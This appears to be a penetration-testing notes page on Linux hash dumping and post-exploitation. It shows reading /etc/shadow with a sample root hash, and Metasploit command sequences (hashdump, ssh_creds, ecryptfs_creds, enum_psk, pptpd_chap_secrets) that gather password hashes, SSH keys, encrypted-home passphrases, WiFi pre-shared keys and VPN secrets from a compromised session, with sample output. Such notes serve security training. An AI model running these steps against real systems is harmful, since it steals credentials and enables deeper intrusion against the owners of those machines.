Linux Hash Dumping

#Hashes Dumping Using /etc/shadow

cat /etc/shadow

📌 root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.

  • Gather Linux Password hashes with Metasploit

#Metasploit

# background the session with CTRL+Z
search hashdump
use post/linux/gather/hashdump
set SESSION 2
run
[+] root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20230323100234_default_192.75.64.3_linux.hashes_660271.txt

  • The unshadowed password file is a file containing the format hashed password, ready to be cracked.

#Some Post Exploitation

  • Enumerate ssh directories

search ssh_creds
use post/multi/gather/ssh_creds
info
# Description:
#   This module will collect the contents of all users' .ssh directories 
#   on the targeted machine. Additionally, known_hosts and 
#   authorized_keys and any other files are also downloaded. This module 
#   is largely based on firefox_creds.rb.
sessions
# Set the Meterpreter session
set SESSION 2
run

  • Enumerate users' .ecrypts directories

search ecryptfs_creds
use post/linux/gather/ecryptfs_creds
info
# Description:
#   This module will collect the contents of all users' .ecrypts 
#   directories on the targeted machine. Collected "wrapped-passphrase" 
#   files can be cracked with John the Ripper (JtR) to recover "mount 
#   passphrases".
sessions
set SESSION 2
run

  • Enumerate WiFi credentials

search enum_psk
use post/linux/gather/enum_psk
info
# Description:
#   This module collects 802-11-Wireless-Security credentials such as 
#   Access-Point name and Pre-Shared-Key from your target CLIENT Linux 
#   machine using /etc/NetworkManager/system-connections/ files. The 
#   module gathers NetworkManager's plaintext "psk" information.
set SESSION 2
run

  • Check for PPTP VPN chap-secrets credentials

search pptpd_chap_secrets
use post/linux/gather/pptpd_chap_secrets
info
# Description:
#   This module collects PPTP VPN information such as client, server, 
#   password, and IP from your target server's chap-secrets file.
set SESSION 2
run
PreviousPass the hashNextCrack the Hash

Last updated